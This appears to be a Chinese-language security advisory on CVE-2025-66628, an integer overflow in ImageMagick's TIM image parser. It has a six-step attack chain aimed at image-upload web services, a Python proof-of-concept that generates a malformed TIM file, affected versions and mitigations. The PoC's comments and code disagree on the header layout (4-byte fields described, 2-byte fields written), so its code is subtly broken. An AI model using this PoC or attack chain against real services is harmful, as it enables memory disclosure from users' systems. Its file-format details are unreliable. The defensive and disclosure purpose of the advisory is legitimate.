CVE-2025-66628 ImageMagick TIM图像解析器整数溢出漏洞

漏洞信息

漏洞编号

CVE-2025-66628

漏洞类型

整数溢出

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ImageMagick

漏洞概述

ImageMagick是一款功能强大的开源图像处理软件套件，用于创建、编辑、组合或转换位图图像。该软件被广泛应用于各种系统和Web服务中。2025年12月披露的CVE-2025-66628漏洞存在于ImageMagick的TIM（PSX TIM）图像格式解析器中，攻击者可以通过构造恶意TIM图像文件触发整数溢出，导致堆缓冲区溢出和内存越界读取。由于该软件通常作为Web服务的后端组件处理用户上传的图像，攻击者可以通过上传恶意图像文件实现远程攻击，无需任何认证或用户交互。此漏洞影响ImageMagick 7.1.2-9及之前版本，CVSS评分7.5，属于高危漏洞。

技术细节

漏洞根源位于ImageMagick源代码文件coders/tim.c的ReadTIMImage函数中。该函数从TIM图像文件头读取宽度和高度字段（均为16位无符号整数，最大值为65535），随后计算图像缓冲区大小：image_size = 2 * width * height。在32位系统或size_t为32位的环境中，当width和height均为较大值时（如65535），计算结果2 * 65535 * 65535 = 8589580800，远超32位整型最大值4294967295，发生整数溢出后得到一个很小的值。程序随后使用AcquireQuantumMemory分配一个远小于实际需要的堆内存缓冲区。当后续代码按照原始未溢出的width和height值进行图像数据读写操作时，会发生堆缓冲区越界访问，可能导致敏感内存信息泄露。攻击者只需诱导目标系统处理一个精心构造的TIM文件即可触发此漏洞。

攻击链分析

STEP 1

步骤1: 侦察阶段

攻击者识别目标Web服务或系统，确认其使用ImageMagick处理图像上传，可能通过文件上传功能、图像缩略图生成或内容审查等模块

STEP 2

步骤2: 漏洞利用构造

攻击者创建包含恶意TIM图像文件的载荷，设置width和height字段为65535，使2*width*height的计算结果在32位系统上发生整数溢出

STEP 3

步骤3: 恶意文件上传

通过目标系统的图像上传接口提交恶意TIM文件，触发ImageMagick的ReadTIMImage函数进行解析

STEP 4

步骤4: 整数溢出触发

ReadTIMImage函数执行image_size = 2 * width * height计算时发生整数溢出，分配远小于实际需要的堆内存缓冲区

STEP 5

步骤5: 堆越界读取

后续代码按照原始未溢出的尺寸进行图像数据读写操作，导致堆缓冲区越界读取，可能泄露敏感内存内容

STEP 6

步骤6: 数据提取

攻击者获取包含敏感信息的图像处理结果，可能包括其他用户数据、会话令牌或系统内存内容

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct
import sys

def create_malicious_tim_file(filename, width=65535, height=65535):
    """
    Generate a malicious TIM image file to trigger integer overflow in ImageMagick
    CVE-2025-66628: Integer overflow in ReadTIMImage function (coders/tim.c)
    
    The TIM file format header contains:
    - Width and Height as 16-bit values
    - Calculation: image_size = 2 * width * height
    - When width=height=65535: 2*65535*65535 = 8589580800 (overflows on 32-bit)
    """
    # TIM file header structure
    # Bytes 0-3: TIM signature (typically 0x00000010)
    # Bytes 4-7: Image type and flags
    # Bytes 8-11: Width (16-bit, little-endian)
    # Bytes 12-15: Height (16-bit, little-endian)
    
    with open(filename, 'wb') as f:
        # TIM header
        f.write(struct.pack('<I', 0x00000010))  # TIM signature
        f.write(struct.pack('<I', 0x00000000))  # Type/flags
        f.write(struct.pack('<H', width))       # Width (16-bit)
        f.write(struct.pack('<H', height))      # Height (16-bit)
        
        # Add minimal image data to pass initial validation
        # The overflow occurs during size calculation before data validation
        f.write(b'\x00' * 16)
    
    print(f"Malicious TIM file created: {filename}")
    print(f"Width: {width}, Height: {height}")
    print(f"Calculated size: {2 * width * height}")
    print(f"On 32-bit systems, this will overflow and wrap to: {(2 * width * height) & 0xFFFFFFFF}")

if __name__ == '__main__':
    if len(sys.argv) > 1:
        create_malicious_tim_file(sys.argv[1])
    else:
        create_malicious_tim_file('exploit_cve_2025_66628.tim')

影响范围

ImageMagick < 7.1.2-10

ImageMagick 7.1.2-9

ImageMagick 7.1.2-8

ImageMagick 7.1.2-7

ImageMagick 7.1.2-6

防御指南

临时缓解措施

如果无法立即升级ImageMagick，可采取以下临时缓解措施：1）禁用或删除ImageMagick对TIM格式的解析支持；2）在文件上传处理流程中添加文件类型白名单限制，仅允许经过验证的安全图像格式；3）使用chroot或容器隔离ImageMagick处理环境，限制潜在攻击影响范围；4）部署Web应用防火墙（WAF）规则，检测并拦截异常图像文件上传请求；5）监控ImageMagick进程的内存访问行为，及时发现异常活动。